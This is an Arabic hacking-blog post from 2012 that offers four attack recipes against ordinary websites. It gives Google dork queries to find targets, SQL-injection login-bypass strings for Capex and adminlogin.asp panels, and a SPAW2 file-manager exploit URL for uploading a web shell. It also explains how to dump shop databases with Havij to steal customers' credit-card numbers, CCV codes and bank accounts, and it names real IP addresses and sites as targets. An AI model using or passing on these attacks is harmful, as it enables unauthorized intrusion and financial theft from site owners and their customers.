عدد زوار الصفحه

اخطر واقوى مدونه هكر فى الشرق الاوسط ترحب بكم

اخطر واقوى مدونه هكر فى الشرق الاوسط ترحب بكم

اهلا بكم فى اخطر واقوى مدونه هكر فى الشرق الاوسط

منـتديـات منـظمـة الإخـتـراق الـعـالـمـية

جارٍ التحميل...

منتديات جيوش الهكرز

جارٍ التحميل...

:: Security امان العرب Arab ::

جارٍ التحميل...

.:: منتديات العاصفة ::.

جارٍ التحميل...

منظمة قبور الهكر

جارٍ التحميل...

مدرسة الهكر الأخلاقي | Ethical Hacker school

جارٍ التحميل...

. : منظمة الهكر العربي : . Arhack.Net

جارٍ التحميل...

شبكة الصاعقة العربية الهكرز | تعليم الهكرز | برامج هكرز

جارٍ التحميل...

شبكة هكر اوف لاين

جارٍ التحميل...

منتديات القرصان

جارٍ التحميل...

الخميس، 7 يونيو 2012

بعض الثغرات المفيدة واستغلالها

... اهلا وسهلا بالجميع ...
السلام عليكم ورحمة الله وبركاتة
يوجد ثغرات كتير بس اكترها مكشوفة فانا جبت 4 ثغرات مش معروفين وليس مسدودين
.:: الاولي ::.
ثغرة | Capexفي1.1 SQL |
الاول ندخل ع جوجل |
WwW.Google.CoM
ونكتب في خانة البحث نكتب
capexweb
وهيطلعلك مواقع زيـ
http://59.90.141.242:8085/capexweb/capexweb
ندخلـ علية :
ونكتب في
Username:
 x'or'x'='x
Password:
x'or'x'='x
وكدة مبروك عليك دخلت علي السي بانل
.::الثانية::.
اولا:
نذهب الي جوجل ::.
[WwW.Google.CoM]
نبحث عن ::
'?spaw2/dialog.php'
بعد كدة
يطلع معانا مواقع زي دي !!
http://www.commercexp.com/spaw2/dialogs/dialog.php
بتروح جي ضايف الاستغلال دة !! يعني بتروح جي ضايف الكلام دة بعدية
module=spawfm&dialog=spawfm&theme=spaw2&lang=sr&c harset=utf- 8&scid=7c78b510c597c41cbd6c469& ne
انت بق اعمل كدة مع اي موقع يطلعلك وبكدة تقدر ترفع الشل
لتحميل الشل
http://www.multiupload.nl/YIPA0UGVXM
تم الانتهاء
.::الثالثة::.
السلامـ عليكم ورحمة الله وبركاتة ...
اولا:
نروح للباحث :
WwW.Google.CoM
ونحط في البحث
(adminlogin.asp)
انسخ ما بين الاقواص فقط !!
تختار اي موقع هيدخل ع لوحة التحكم
تكتب في
User:
admin
Pass:
 ('=''or')
انسخ ما بين الاقواص فقط
نم الانتهاء
.:: الرابعة ::.
تسمي بثغرة قاعدة البيانات
هي ثغرة بتقدر من خلالها سحب معلومات الموقع وبياناتة
من اكونتات بنكية , اميلات , ومعلومات
اولأ: نروح لجوجل ::.
WwW.Google.CoM
ونبحث عن  الكود التالي ::.
انا جبتلك كذا كود لتسهيل الامر ::. علشان تتطلع مواقع مصابة كتير ::.
inurl:shop.php?do=part&id=

inurl:shopping.php?id=

inurl:produit.php?id=

inurl:buy.php?category=

inurl:boutique.php?page=

ندخل بقي علي الشرح ::.
ملحوظة ::.
هتلاقي الاميلات البنكية فيـ
Users
او
orders
او
Customers
.....
ملحوظة تانية ::.
اللي بتعلم عليهم علشان نسحب الفيزات والاكونتات البنكية هما ::.
1-CCV
2-CCNumbeR
3-CCexpiration_data
وشكرا ::.
الشرح :::. صور ::. وعليها كل الخطوات
لتحميل الشرح
http://www.multiupload.nl/L04KZL5ZIH
ملحوظة ::.
انا عندي مجبليش فيزات لان الموقع اللي حطوا دة لسة جديد مفهوش فيزات ::.
حضرتك لما تجرب وتبحث في جوجل هيجيلك مواقع كتير جدا بتاخد اي موقع منهم وبتسحب زي ما في الصور ::....
......
::. تحميل البرنامج ::. Havij 1.3
علي 5 سيرفرات ::. MultiUpload::.
http://www.multiupload.nl/NFWKTT7CDU
.....
تم الانتهاء
السلام عليكم ورحمة الله وبركاتة

مرسلة بواسطة في

ليست هناك تعليقات:

إرسال تعليق

الاشتراك في: تعليقات الرسالة (Atom)